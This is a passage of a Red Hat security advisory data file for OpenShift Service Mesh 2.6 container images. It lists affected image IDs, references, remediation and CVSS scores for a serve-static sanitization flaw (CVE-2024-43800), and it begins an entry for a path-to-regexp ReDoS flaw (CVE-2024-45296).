"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", 